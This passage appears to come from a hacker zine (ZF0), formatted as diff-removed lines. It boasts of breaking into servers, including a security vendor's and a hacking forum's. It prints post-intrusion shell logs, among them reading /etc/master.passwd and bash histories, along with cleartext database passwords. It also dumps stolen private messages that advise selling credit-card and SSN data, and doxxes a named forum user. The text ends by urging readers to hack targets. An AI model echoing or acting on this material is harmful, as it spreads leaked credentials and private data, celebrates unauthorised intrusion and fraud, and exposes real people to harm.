-$wgEnotifUserTalk = true; # UPO
-$wgEnotifWatchlist = true; # UPO
-$wgEmailAuthentication = true;
-$wgDBtype = "mysql";
-$wgDBserver = "csql";
-$wgDBname = "wikidb";
-$wgDBuser = "wikiuser";
-$wgDBpassword = "cocokiki"; # that's just great
-# MySQL specific settings
-$wgDBprefix = "";
-# MySQL table options to use during installation or update
-$wgDBTableOptions = "TYPE=InnoDB";
-# Experimental charset support for MySQL 4.1/5.0.
-$wgDBmysql5 = false;
-# Postgres specific settings
-$wgDBport = "5432";
-$wgDBmwschema = "mediawiki";
-$wgDBts2schema = "public";
-$wgEnableUploads = true;
-$wgUseImageMagick = true;
-$wgImageMagickConvertCommand = "/usr/bin/convert";
-## If you want to use image uploads under safe mode,
-## create the directories images/archive, images/thumb and
-## images/temp, and make them all writable. Then uncomment
-## this, if it's not already uncommented:
-$wgHashedUploadDirectory = false;
-## If you have the appropriate support software installed
-## you can enable inline LaTeX equations:
-$wgUseTeX = false;
-$wgLocalInterwiki = $wgSitename;
-$wgLanguageCode = "en";
-$wgProxyKey =
-apache@tcfweb1 /var/www/outage $ /sbin/ifconfig
-eth0 Link encap:Ethernet HWaddr 00:16:3E:49:C6:9D
- inet addr: Bcast: Mask:
- inet6 addr: fe80::216:3eff:fe49:c69d/64 Scope:Link
- RX packets:61905650 errors:0 dropped:0 overruns:0 frame:0
- TX packets:56896749 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:1000
- RX bytes:36185145376 (34508.8 Mb) TX bytes:37393006820 (35660.7 Mb)
-eth0:0 Link encap:Ethernet HWaddr 00:16:3E:49:C6:9D
- inet addr: Bcast: Mask:
- RX packets:61905650 errors:0 dropped:0 overruns:0 frame:0
- TX packets:56896749 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:1000
- RX bytes:36185145376 (34508.8 Mb) TX bytes:37393006820 (35660.7 Mb)
-lo Link encap:Local Loopback
- inet addr: Mask:
- inet6 addr: ::1/128 Scope:Host
- RX packets:6692253 errors:0 dropped:0 overruns:0 frame:0
- TX packets:6692253 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:0
- RX bytes:1658253609 (1581.4 Mb) TX bytes:1658253609 (1581.4 Mb)
-apache@tcfweb1 /var/www/outage $ ps auxww
-root 1 0.0 0.0 2680 584 ? Ss Mar18 0:00 init [3]
-root 2 0.0 0.0 0 0 ? S Mar18 0:00 [migration/0]
-root 3 0.0 0.0 0 0 ? SN Mar18 0:00 [ksoftirqd/0]
-root 4 0.0 0.0 0 0 ? S< Mar18 0:00 [events/0]
-root 5 0.0 0.0 0 0 ? S< Mar18 0:00 [khelper]
-root 6 0.0 0.0 0 0 ? S< Mar18 0:00 [kthread]
-root 8 0.0 0.0 0 0 ? S< Mar18 0:00 [xenwatch]
-root 9 0.0 0.0 0 0 ? S< Mar18 0:00 [xenbus]
-root 59 0.0 0.0 0 0 ? S< Mar18 0:00 [kblockd/0]
-root 62 0.0 0.0 0 0 ? S< Mar18 0:00 [kseriod]
-root 80 0.0 0.0 0 0 ? S Mar18 0:00 [pdflush]
-root 81 0.0 0.0 0 0 ? S Mar18 0:10 [pdflush]
-root 82 0.0 0.0 0 0 ? S< Mar18 0:00 [kswapd0]
-root 83 0.0 0.0 0 0 ? S< Mar18 0:00 [aio/0]
-root 215 0.0 0.0 0 0 ? S< Mar18 0:00 [kpsmoused]
-root 218 0.0 0.0 0 0 ? S< Mar18 0:00 [reiserfs/0]
-root 294 0.0 0.0 7164 596 ? S<s Mar18 0:00 /sbin/udevd --daemon
-root 575 0.0 0.0 0 0 ? S< Mar18 0:00 [khubd]
-root 1954 0.0 0.0 5896 780 ? Ss Mar18 0:03 /usr/sbin/syslogd
-root 1964 0.0 0.0 2680 308 ? Ss Mar18 0:00 /usr/sbin/klogd -c 3 -2
-bin 2419 0.0 0.0 3732 416 ? Ss Mar18 0:00 /sbin/portmap
-root 2532 0.0 0.0 19140 848 ? Ss Mar18 0:00 /usr/sbin/sshd
-root 2588 0.0 0.0 2704 408 ? Ss Mar18 0:00 /usr/bin/svscan /service
-root 2592 0.0 0.0 2536 368 ? S Mar18 0:00 supervise qmail-smtpd
-root 2593 0.0 0.0 2532 364 ? S Mar18 0:00 supervise log
-root 2594 0.0 0.0 2532 364 ? S Mar18 0:00 supervise qmail-send
-root 2595 0.0 0.0 2536 368 ? S Mar18 0:00 supervise log
-qmaild 2596 0.0 0.0 3780 580 ? S Mar18 0:00 /usr/bin/tcpserver
--p -v -R -x /etc/tcprules.d/tcp.qmail-smtp.cdb -c 40 -u 201 -g 200 smtp /var/qmail/bin/qmail-smtpd
-qmails 2597 0.0 0.0 2724 464 ? S Mar18 0:03 qmail-send
-qmaill 2598 0.0 0.0 2548 364 ? S Mar18 0:00 /usr/bin/multilog
-t s2500000 n10 /var/log/qmail/qmail-send
-qmaill 2599 0.0 0.0 2544 364 ? S Mar18 0:00 /usr/bin/multilog
-t s2500000 n10 /var/log/qmail/qmail-smtpd
-root 2607 0.0 0.0 2676 404 ? S Mar18 0:00 qmail-lspawn #
-Uncomment the next line for .forward
-support?#|dot-forward .forward?./.maildir/
-qmailr 2608 0.0 0.0 2804 664 ? S Mar18 0:00 qmail-rspawn
-qmailq 2609 0.0 0.0 2664 404 ? S Mar18 0:00 qmail-clean
-root 2856 0.0 0.8 38832 13312 ? SLs Mar18 0:14 heartbeat: master control process
-nobody 2911 0.0 0.4 32100 6580 ? SL Mar18 0:00 heartbeat: FIFO reader
-nobody 2912 0.0 0.4 32228 6708 ? SL Mar18 0:01 heartbeat: write: ucast eth0
-nobody 2913 0.0 0.4 32228 6708 ? SL Mar18 0:00 heartbeat: read: ucast eth0
-nobody 2914 0.0 0.4 32228 6708 ? SL Mar18 0:00 heartbeat: write: ucast eth0
-nobody 2915 0.0 0.4 32228 6708 ? SL Mar18 0:05 heartbeat: read: ucast eth0
-nobody 2916 0.0 0.4 32228 6708 ? SL Mar18 0:02 heartbeat: write: ping
-nobody 2917 0.0 0.4 32228 6708 ? SL Mar18 0:01 heartbeat: read: ping
-ntp 2918 0.0 0.0 10780 856 ? S Mar18 0:00 /usr/sbin/ntpd -s
-root 2919 0.0 0.0 10780 568 ? Ss Mar18 0:00 /usr/sbin/ntpd -s
-root 2977 0.0 0.3 25300 5108 ? S Mar18 0:04
-/usr/sbin/snmpd -p /var/run/
-root 3033 0.0 0.0 9096 744 ? Ss Mar18 0:00 /usr/sbin/cron
-infra 3446 0.0 0.0 6336 704 ? S Mar18 0:00 /bin/sh ./
-infra 3449 0.0 0.0 1496 496 ? S Mar18 0:01
-/home/infra/bbc/bin/bbrun -a /home/infra/bbc/ext/
-infra 3450 0.0 0.0 6336 700 ? S Mar18 0:00 /bin/sh ./
-infra 3453 0.0 0.0 6336 672 ? S Mar18 0:00 /bin/sh ./
-infra 3454 0.0 0.0 1496 500 ? S Mar18 0:01
-/home/infra/bbc/bin/bbrun -a /home/infra/bbc/bin/
-root 3466 0.0 0.0 5892 784 tty1 Ss+ Mar18 0:00 /sbin/agetty 38400 tty1 linux
-root 3467 0.0 0.0 5888 784 tty2 Ss+ Mar18 0:00 /sbin/agetty 38400 tty2 linux
-root 3468 0.0 0.0 5888 784 tty3 Ss+ Mar18 0:00 /sbin/agetty 38400 tty3 linux
-root 3469 0.0 0.0 5888 780 tty4 Ss+ Mar18 0:00 /sbin/agetty 38400 tty4 linux
-root 3470 0.0 0.0 5888 784 tty5 Ss+ Mar18 0:00 /sbin/agetty 38400 tty5 linux
-root 3471 0.0 0.0 5888 780 tty6 Ss+ Mar18 0:00 /sbin/agetty 38400 tty6 linux
-infra 3578 0.0 0.0 1496 500 ? S Mar18 0:00
-/home/infra/bbc/bin/bbrun -a /home/infra/bbc/ext/
-apache 16145 0.0 0.1 10764 1948 ? Ss 22:48 0:00 /usr/sbin/apache -i
-apache 16278 4.7 4.9 556664 78568 ? Sl 22:49 0:44
-/usr/sbin/apache2 -D DEFAULT_VHOST -D PHP5 -D INFO -D SSL -d
-/usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
-apache 16468 4.6 4.8 554316 76260 ? Sl 22:50 0:41
-/usr/sbin/apache2 -D DEFAULT_VHOST -D PHP5 -D INFO -D SSL -d
-/usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
-apache 18795 3.8 3.7 377444 59548 ? Sl 23:04 0:02
-/usr/sbin/apache2 -D DEFAULT_VHOST -D PHP5 -D INFO -D SSL -d
-/usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
-apache 18959 0.0 0.6 440788 9592 ? Sl 23:05 0:00
-/usr/sbin/apache2 -D DEFAULT_VHOST -D PHP5 -D INFO -D SSL -d
-/usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
-apache 18996 0.0 0.0 8500 996 ? R 23:05 0:00 ps auxww
-root 22627 0.0 0.9 161988 15664 ? Ss Apr15 0:05
-/usr/sbin/apache2 -D DEFAULT_VHOST -D PHP5 -D INFO -D SSL -d
-/usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
-apache 29185 0.0 0.4 131608 7288 ? S Apr16 0:00
-/usr/sbin/apache2 -D DEFAULT_VHOST -D PHP5 -D INFO -D SSL -d
-/usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
-root 29813 0.0 0.0 0 0 ? S< Apr16 0:00 [rpciod/0]
-root 29815 0.0 0.0 0 0 ? S Apr16 0:00 [lockd]
-apache@tcfweb1 /var/www/outage $ lastlog | grep -v Never
-root pts/0 tecra.home.gaima Thu Apr 17 20:24:34 +0100 2008
-nfrance pts/1 asteroid.comodo. Wed Jun 13 20:41:21 +0100 2007
-apache@tcfweb1 /var/www $ ls -al /home
-total 1
-drwxr-xr-x 8 root root 224 Oct 25 13:26 .
-drwxr-xr-x 22 root root 568 Oct 9 2007 ..
--rw-r--r-- 1 root root 0 Feb 7 2006 .keep
-drwx---r-x 4 ddanks users 216 Oct 25 13:26 ddanks
-drwxr-xr-x 2 root ftp 48 Mar 26 2007 ftp
-drwxr-xr-x 5 infra users 376 Mar 19 2007 infra
-drwx---r-x 3 mwilliams users 160 Dec 18 2006 mwilliams
-drwx---r-x 3 nfrance users 192 Mar 13 2007 nfrance
-drwx---r-x 3 ralden users 160 Dec 18 2006 ralden
-apache@tcfweb1 /var/www $ cat /var/www/ # what
-CEO doesn't have WP these days
-// ** MySQL settings ** //
-define('DB_NAME', 'wordpress'); // The name of the database
-define('DB_USER', 'wordpress'); // Your MySQL username
-define('DB_PASSWORD', 'd4t4b4s3'); // ...and password # Whitehats have bought
-the trademark rights for l33t sp33k passwds
- # Never use l33t sp33k passwds unless you want
-to be sued for copyright infringement
-define('DB_HOST', 'csql'); // 99% chance you won't need to change this value
-define('DB_CHARSET', 'utf8');
-define('DB_COLLATE', '');
-Comodo CA Limited
-Tested: 06-May 2008 17:02:01 GMT
-This site is tested daily using Comodo's HackerProof Vulnerability Scanning
-Service. The service performs an extensive range of tests to insure there are
-no holes or weaknesses on this sites server. This trusted site seal is only
-presented after the site has been deemed secure. You can conduct business with
-this site knowing that the site owner has taken every precaution to protect
-their site from intruders.
-Comodo's HackerProof Vulnerability Scanning Service is enhanced daily to insure
-up to date vulnerability tests against the latest security threats.
-Company Name: Comodo CA Limited
-Company Address: 3rd Floor, Building 26 Office Village, Exchange Quay
-Trafford road Salford, Greater Manchester, M5 3EQ, United Kingdom
-Time for a recall, HackerProof is HackerPwned.
-zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0
-zf0 zf0
-zf0 Call For 0wning zf0
-zf0 zf0
-zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0
-== Call For 0wning ==
-Yippie kayay motherfucker!
-== Results ==
-Once again we brought in the own. This time we had contributions. Two very
-public groups provided some good owns/starts early after the ZF03 publication.
-We eventually had to re-own on both cases but that was our fault for sitting on
-them. We forgot to ask if they wanted credit or not. They probably do but
-assumptions suck. I guess if they want it they can claim it and we will confirm
-(or deny if some loser group poses) in ZF05 or on FD.
-As well, one unassociated individual did fantastic work nearer to publication.
-Good work to all of you! We really do appreciate the help and take it into
-consideration very seriously when judging or contemplating owning or helping
-someone. Great to get some help and good to know someone actually reads this.
-== Next Target ==
-Sorry. There is no target this time. There are a lot of reasons, but the short
-of it is that there is nothing that really grinds us collectively right now.
-We're also, individually, venturing into different hacking interests and
-hacking side projects. This also means that the owns might be a little
-different or more diverse in the next zine. We'll probably need a lot of
-relaxing time before we can sit down together and go after a broad target.
-== Options ==
-What should you do with your time, now that your CF0 target has not
-materialised? Hack something! Don't talk about it, do it! And don't be like
-g00ns, scanning for a set of shitty public RFI vulns and owning stupid websites
-run by people who know nothing about technology. At least, not if you are doing
-that just to support your hacker ego. There are good uses for random sites, but
-if you don't have those reasons then just work on something productive.
-Try to challenge yourself, go after stuff a little more complicated than
-before. Occasionally we see really sweet hacks happening, and we love it.
-That's just our advice, don't take it too seriously. It's your life. Just
-remember that it is what you make it.
-== Before You Go... ==
-That doesn't mean you can't send us stuff. We accept hack logs, articles,
-accounts, warez, exploits, stories, tributes, etc. If we get truly something
-awesome we could always publish it in ZF05 if you wanted and it was exclusive.
-zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0
-zf0 zf0
-zf0 Blackcode zf0
-zf0 zf0
-zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0
-"Four thousand holes in blackburn, lancashire
- And though the holes were rather small
- They had to count them all"
- - John "Spiderman" Lennon
-Oh blackcode, between Milamber (see ZF03) representing your skillset and tripple
-representing your mouth how could we not own you? Its just a shame I didn't save
- a certain thread in which r0xt3hwhatevers0x claimed the reason blackcode had
-not been owned was because it was impossible!
-A little background: We saw Mil make a post on Blackcode saying it was just a
-couple accounts and his owning wasn't that bad. So for laughs we logged in as
-him and posted our rebuttal. Tripple freaked out. Mil doesn't like changing
-passes, even if we've displayed them in cleartext in multiple zines. The truth
-is that he likes to be published because it gives him attention that he could
-not dream about getting otherwise. That's ZF0's expert psychologist dropping his
-No Mil, we do NOT have room for you to have your own article in ZF04. Now fuck
-So blackcode is another one of those kiddie breeding grounds. It seems these
-days newbs either end up idling in 4chan or joining elitehackers/blackcode.
-Blackcode have long been allied with tripple who probably openly admits to being
- the biggest bastard on the internet, and to his credit, he does keep most of
-blackcode's legions of kiddie drones in check. His skills as a Scottish
-bastard (fact) aren't in question but his computer skills certainly are. He has
-nothing to back up his rants when the big boys come to town. He pretty much
-talked blackcode into being owned by defending his fellow lame friend Milamber.
- Tripple has achived nothing in five years at blackcode. He has achieved nothing
-but lived out the stereotypical scotsman's life. The problem is he is too soft
- to do it irl - he prefers the internet! And on the internet you need skills.
-Firstly, let's take a look at some "private messages". (BTW, don't miss
-tripple's "carding history" PM, it's gold)
-tripple -> iadnah
-Not sure who it is yet as I aint spoken to Mil. This site is not a target so no
-need to worry about that.
-# Yes tripple, because you issuing an open challenge for us to own you does not
-# make you or the site you mod for a target :/ idiot.
-lloth -> iadnah
-Could you upload it somewhere below the public_html in my account on this
-As long as we get the admin passwords, we'll be fine. Then I'll dump the new
-database and pass that along to you. Then let the fun commence. Razz
-I'm hoping that some of the people overlap other forums.
-# Oh how fun, Blackcode backdoor their own forum in a vain attempt to actually
-# hack!
-r0x t3h s0x -> iadnah
-Not saying anything to tripple Razz He has no reason to be pissed about me
-gaining admin. He'd only be pissed because of another tiff that had come up in
-IRC (you've probably seen it on the boards)
-Would just like to clarify that I had no malicious intentions when gaining the
-powaz. It just started as a probe (first script was a "hello world") and then
-became "can I open files with this?" and eventually "can I connect to MySQL
-with this?" and then fo` shits 'n' giggles I made myself admin. Didn't actually
-use the admin powers.. except for when I locked that thread in the tutorials forum.
-Aaanyway.. I'll speak to X and see where he stands.
-# Lolz, hacked by one of their own mods. Sounds like eleet 0day techniquez too.
-# :/
-tripple -> iadnah
-2 users of this site were arrested and computers were confiscated also. I think
-its best that we keep a very close eye on the forums for now as no doubt they
-will be getting visits from law enforcement agencies. I spoke to X about it and
-he seems to agree.
-I cant names the members mate as much as i would like to tell you but i have
-given my word so ill let them fill anyone in if they choose to.
-I seen the post about IRC also mate, that will give people something to do
-Hows shit going now anyway?
-# FUCK!!! RAIDED!!!!!
-I think him hosting the IRC could be a problem mate, I am pretty sure that
-would still be classed as associating with known criminals, even though neither
-of them have been to trial yet.
-Thats fucked about moving your stuff etc. I could send you about $100, it aint
-much but it will help.
-I aint really ben up t much, just trying to keep my nose clean.
-Saved the number in my phone so you never know, I might call one night but
-beware the accent
-# Tripple still didn't pay up for Iadnah's "services"
-Cool Ill call sometime in the next week or so then mate as Im working lates all
-this week, reconsider the offer though as I know what its like to struggle and
-dont let pride get in the way of this ok, we have known each other a long time
-now and I would hate to think that pride would get between us
-# Phone sex
-I dont really have time these days to be honest mate, I got way to much on the
-go right now. Got a few court cases coming up also so trying to keep focused on
-them rather than anythig else.
-# Tripple curb crawls hoes
-That kinda info is the exact kinda info that would net you a serious amount of
-cash if it fell into the right hands BUT also a serious amount of time should
-the law know about it mate.
-The fact that you have teachers addresses, SS# and I will assume their ages, is
-something that credit card scammers would love to have.
-I had a scam going in a previous job where I would sell CC details to people
-that could clone cards and im sure you can imagine what they did once they had
-the cards.
-If the daetails were to fall into the hands of someone like that then they
-would pay quite well for it, provided it was enough info, when my case went to
-court they estimated that I made around £135,000 by selling the details alone
-and that the people I sold them to made over 2 million from it, so im sure you
-can imagine how much these type of people would like the info provided that
-their is enough info there.
-# HAHAHAHA. Tripple you bellend. I hope you are in jail right now. Carding,
-# who'd have thought ey? The loud mouth cocky prick of Blackcode.
-I already new those types of people mate due to the circles I mixed in before I
-met my ex and had a kid, you might wanna try any local drug dealer, while they
-wont be of direct use to them (unless they have the facilities) they quite
-possibly could put you in touch with someone, do use the kiddie dealers though
-and be very carefull exactly what information you tell them you have.
-# Boy does this guy get around, drug dealing. You bad man tripple. lulz.
-You should be careful about making comments like this one:
-jaber89 wrote on Wed, 22 August 2007 23:31
-So you criticize people about posting anonymously on forums and what not. Are
-you not the exact thing you taunt? and if you are not afraid of saying who you
-are i would enjoy the following information.
-Your name:
-Your Ip Adress:
-Your current OS:
-Your Name: James Showe
-Your IP:
-OS: Windows XP SP2 or maybe Media Center
-Browser: Firefox
-You live somewhere in Texas, I'm guessing near Austin.
-Now, don't take this as a threat or anything. I'm really not an asshole, unlike
-some people online are. I'm just trying to illustrate that unless you have the
-skills and forethought to protect yourself you shouldn't say things like that
-to people who tend to take it personally.
-You're right about the anonymous thing from your perspective, but what tripple
-is referring to is a little different. He's saying that the zf0 people are
-anonymous in that they won't even leave anything like a handle or screen name,
-so nobody really knows who they are. You have a valid point though.
-# Iadnah bullying his members! :0
-Not sure if you saw it yet, but ZF0 3 is out.
-That, and (which is referring to the zf0)
- tart=0#msg_15399
-Makes me think that we might be attacked next.
-It might be a good idea to give the security of the site a bit of a tune up,
-just in case.
-Tell me what you think. If you need help with anything, just drop me a line.
-# That Lloth kid is pretty smart, totally put 2+2 together there. So here you
-# are Lloth, see logs below :)
- logs
-$ uname -a; id
-OpenBSD 4.1 GENERIC#1435 i386
-uid=1006(bc) gid=1005(bc) groups=1005(bc), 10(users), 1003(bcstaff)##sweet
-$ cat /etc/master.passwd
-daemon:*:1:1::0:0:The devil himself:/root:/sbin/nologin
-operator:*:2:5::0:0:System &:/operator:/sbin/nologin
-bin:*:3:7::0:0:Binaries Commands and Source,,,:/:/sbin/nologin
-smmsp:*:25:25::0:0:Sendmail Message Submission
-popa3d:*:26:26::0:0:POP3 Server:/var/empty:/sbin/nologin
-sshd:*:27:27::0:0:sshd privsep:/var/empty:/sbin/nologin
-_x11:*:35:35::0:0:X Server:/var/empty:/sbin/nologin
-_kdc:*:59:59::0:0:Kerberos Server:/var/empty:/sbin/nologin
-_kadmin:*:60:60::0:0:Kerberos Admin Server:/var/empty:/sbin/nologin
-_spamd:*:62:62::0:0:Spam Daemon:/var/empty:/sbin/nologin
-www:*:67:67::0:0:HTTP Server:/var/www:/sbin/nologin
-_isakmpd:*:68:68::0:0:isakmpd privsep:/var/empty:/sbin/nologin
-named:*:70:70::0:0:BIND Name Service Daemon:/var/named:/sbin/nologin
-proxy:*:71:71::0:0:Proxy Services:/nonexistent:/sbin/nologin
-_syslogd:*:73:73::0:0:Syslog Daemon:/var/empty:/sbin/nologin
-_pflogd:*:74:74::0:0:pflogd privsep:/var/empty:/sbin/nologin
-_bgpd:*:75:75::0:0:BGP Daemon:/var/empty:/sbin/nologin
-_tcpdump:*:76:76::0:0:tcpdump privsep:/var/empty:/sbin/nologin
-_dhcp:*:77:77::0:0:DHCP programs:/var/empty:/sbin/nologin
-_mopd:*:78:78::0:0:MOP Daemon:/var/empty:/sbin/nologin
-_tftpd:*:79:79::0:0:TFTP Daemon:/var/empty:/sbin/nologin
-_rbootd:*:80:80::0:0:rbootd Daemon:/var/empty:/sbin/nologin
-_afs:*:81:81::0:0:afs Daemon:/var/empty:/sbin/nologin
-_ppp:*:82:82::0:0:PPP utilities:/var/empty:/sbin/nologin
-_ntp:*:83:83::0:0:NTP Daemon:/var/empty:/sbin/nologin
-_ftp:*:84:84::0:0:FTP Daemon:/var/empty:/sbin/nologin
-_ospfd:*:85:85::0:0:OSPF Daemon:/var/empty:/sbin/nologin
-_hostapd:*:86:86::0:0:HostAP Daemon:/var/empty:/sbin/nologin
-nobody:*:32767:32767::0:0:Unprivileged user:/nonexistent:/sbin/nologin
-_vsftpd:*************:513:513:daemon:0:0:vsftpd user:/nonexistent:/sbin/nologin
-$ last
-bc ttyp0 Fri Apr 18 12:48 - 12:54 (00:05)
-iadnah ttyp0 Wed Apr 16 12:16 - 12:19 (00:03)
-iadnah ttyp3 Tue Apr 15 19:26 - 19:26 (00:00)
-iadnah ttyp3 Tue Apr 15 19:25 - 19:26 (00:01)
-iadnah ttyp3 Tue Apr 15 19:24 - 19:24 (00:00)
-iadnah ttyp3 Tue Apr 15 19:22 - 19:23 (00:00)
-iadnah ttyp0 Tue Apr 15 19:16 - 21:41 (02:25)
-iadnah ttyp0 Tue Apr 15 19:03 - 19:08 (00:05)
-iadnah ttyp0 Tue Apr 15 16:49 - 19:00 (02:10)
-bc ttyp6 Tue Apr 15 15:12 - 18:02 (02:50)
-bc ttyp3 Tue Apr 15 15:08 - 17:19 (02:11)
-bcbot ttyp0 Tue Apr 15 13:40 - 16:28 (02:47)
-iadnah ttyp0 Sun Apr 13 03:15 - 05:28 (02:13)
-iadnah ttyp0 Sat Apr 12 22:30 - 22:31 (00:01)
-bc ttyp0 Sat Apr 12 15:14 - 18:59 (03:44)
-bc ttyp0 Wed Apr 9 18:25 - 20:56 (02:31)
-bc ttyp0 Wed Apr 9 14:01 - 17:13 (03:12)
-bc ttyp0 Wed Apr 9 14:01 - 14:01 (00:00)
-bc ttyp0 Tue Apr 8 20:14 - 22:47 (02:33)
-bc ttyp3 Tue Apr 8 18:15 - 20:26 (02:11)
-bc ttyp3 Tue Apr 8 18:14 - 18:14 (00:00)
-bridge ttyp0 Tue Apr 8 16:52 - 19:05 (02:13)
-bc ttyp0 Mon Apr 7 19:06 - 21:25 (02:19)
-iadnah ttyp4 Mon Apr 7 18:16 - 18:45 (00:29)
-bc ttyp3 Mon Apr 7 17:44 - 18:45 (01:01)
-bc ttyp0 Mon Apr 7 16:24 - 18:42 (02:17)
-bc ttyp3 Mon Apr 7 12:14 - 15:07 (02:53)
-iadnah ttyp0 Mon Apr 7 12:13 - 14:32 (02:19)
-iadnah ttyp3 Sun Apr 6 23:11 - 02:07 (02:55)
-bc ttyp0 Sun Apr 6 23:11 - 01:21 (02:10)
-bc ttyp4 Sun Apr 6 20:29 - 22:50 (02:21)
-iadnah ttyp3 Sun Apr 6 17:56 - 21:44 (03:47)
-bc ttyp0 Sun Apr 6 17:54 - 21:41 (03:47)
-iadnah ttyp3 Sun Apr 6 16:52 - 16:59 (00:07)
-iadnah ttyp0 Sun Apr 6 15:48 - 16:59 (01:10)
-iadnah ttyp4 Fri Apr 4 09:02 - 11:53 (02:51)
-bc ttyp3 Fri Apr 4 08:48 - 11:53 (03:05)
-bc ttyp0 Fri Apr 4 07:54 - 10:40 (02:45)
-bc ttyp0 Fri Apr 4 06:38 - 06:42 (00:04)
-bc ttyp7 Thu Apr 3 22:44 - 00:59 (02:15)
-bc ttyp6 Thu Apr 3 21:31 - 22:54 (01:22)
-bcbot ttyp0 Thu Apr 3 21:08 - 23:19 (02:10)
-bc ttyp6 Thu Apr 3 19:36 - 21:29 (01:53)
-bc ttyp0 Thu Apr 3 16:38 - 19:45 (03:07)
-bc ttyp0 Wed Apr 2 21:35 - 00:49 (03:13)
-bc ttyp6 Wed Apr 2 18:11 - 21:50 (03:39)
-bc ttyp0 Wed Apr 2 16:47 - 18:20 (01:32)
-bc ttyp0 Wed Apr 2 14:30 - 16:46 (02:15)
-bc ttyp6 Wed Apr 2 10:42 - 14:39 (03:57)
-bc ttyp0 Wed Apr 2 06:51 - 10:50 (03:59)
-bc ttyp6 Wed Apr 2 06:11 - 06:59 (00:47)
-bc ttyp0 Wed Apr 2 05:18 - 06:20 (01:01)
-bc ttyp0 Tue Apr 1 23:14 - 00:20 (01:06)
-bc ttyp0 Tue Apr 1 20:13 - 21:52 (01:38)
-bc ttyp6 Tue Apr 1 20:03 - 20:13 (00:10)
-bc ttyp0 Tue Apr 1 19:04 - 20:11 (01:07)
-iadnah ttyp0 Tue Apr 1 19:00 - 19:04 (00:04)
-lloth ttyp0 Tue Apr 1 16:04 - 16:05 (00:00)
-lloth ttyp0 Tue Apr 1 14:53 - 15:17 (00:23)
-bc ttyp6 Tue Apr 1 03:43 - 07:18 (03:34)
-bc ttyp0 Tue Apr 1 01:58 - 03:51 (01:53)
-wtmp begins Tue Apr 1 01:38 2008
-$ pwd
-$ ls -la
-total 41388
-drwxr-xr-x 11 bc bc 1024 Apr 9 18:43 .
-drwxr-xr-x 14 root daemon 512 Feb 26 16:40 ..
--rw------- 1 bc bc 10105 Apr 18 12:54 .bash_history
--rw-r--r-- 1 bc bc 616 Jan 25 19:38 .bashrc
--rw-r--r-- 1 bc bc 776 Mar 2 2006 .cshrc
-drwxr-xr-x 2 bc bc 512 Aug 20 2007 .log
--rw-r--r-- 1 bc bc 317 Mar 2 2006 .login
--rw-r--r-- 1 bc bc 105 Mar 2 2006 .mailrc
--rw------- 1 bc bc 16301 Apr 9 18:43 .mysql_history
--rw-r--r-- 1 bc bc 616 Jan 25 19:39 .profile
-drwx------ 2 bc bc 512 Aug 20 2007 .ssh
--rw-r--r-- 1 bc bc 1808 Mar 26 17:48
-drwxr-x--- 14 bc bc 512 Jan 28 10:50 FUDforum
-drwxr-xr-x 2 bc bc 512 Apr 28 2007 ads
-drwxr-xr-x 3 bc bc 512 Apr 15 18:02 bcincludes
-drwxr-xr-x 2 bc bc 512 Apr 9 14:01 chat
--rw-r--r-- 1 bc bc 239 Feb 11 19:40 filter.php
--rw-r--r-- 1 bc bc 0 Nov 29 18:35 gparse.php
--rw-r--r-- 1 root bc 344 Aug 18 2007 hash.php
-drwxr-xr-x 2 bc bc 512 Mar 16 17:05 jobs
--rw-r--r-- 1 bc bc 497 Sep 12 2007 log.php
--rwxr-xr-x 1 bc bc 6551 Apr 6 18:06 nmap-runner
--rw-r--r-- 1 bc bc 92 Apr 6 18:06 nmap-runner.c
--rw-r--r-- 1 bc bc 369 Aug 9 2006 pleft.jpg
-drwxr-xr-x 22 bc bc 2048 Apr 15 16:42 public_html
--rw-r--r-- 1 bc bc 1890 Mar 16 16:58 scanjob.php
--rw-r--r-- 1 bc bc 226 Jan 9 2007 search.php
-drwxr-xr-x 2 bc bc 512 Apr 2 17:33 sql
--rw-r--r-- 1 root bc 21073573 Nov 26 17:03 sql.html
--rw-r--r-- 1 bc bc 33 Apr 2 17:46 sql_cache.php
--rw-r--r-- 1 bc bc 1918 Feb 11 19:35 stop_words
-$ cat .bash_history
-nano bcincludes/defleft.php
-nano bcincludes/defright.php
-nano bcincludes/top.php
-nano public_html/scripts/lib.js.php
-nano public_html/scripts/app_panel.js.php
-nano public_html/scripts/lib.js.php
-nano public_html/apps/ntools.php
-man whois
-nano public_html/tools.php
-nano public_html/toolbox2.php
-nano public_html/subjob.php
-whois | less
-man whois
-whois help
-whois domain
-whois help
-whois help | less
-whois 'domain'
-whois 'domain' | less
-nano bcincludes/main.php
-nano public_html/apps/ntools.php
-nano public_html/apps/ntools.php
-nano bcincludes/top.php
-cd public_html/
-cd themes/bc/
-nano main.css
-nano ../../../bcincludes/top.php
-nano ../../../bcincludes/main.php
-nano ../../../bcincludes/top.php
-cd FUDforum/
-nano fud_src/
-ls scripts/
-grep {FULL_ROOT} *
-grep -r {FULL_ROOT} *
-grep -r {FULL_ROOT} src/
-grep -r {FULL_ROOT} src/ | less
-grep -r FULL_ROOT src/ | less
-grep -r FULL_ROOT src/ | less | grep 0v header
-grep -r FULL_ROOT src/ | less | grep -v header
-nano include/
-grep -r FULL_ROOT include/ | less | grep -v header
-nano include/
-grep -r FULL_ROOT include/ | less | grep -v header
-grep -r FULL_ROOT thm/BC/ | less | grep -v header
-grep -r FULL_ROOT thm/BC/tmpl/ | less | grep -v header
-nano include/
-nano bcincludes/top.php
-nano bcincludes/defleft.php
-nano bcincludes/top.php
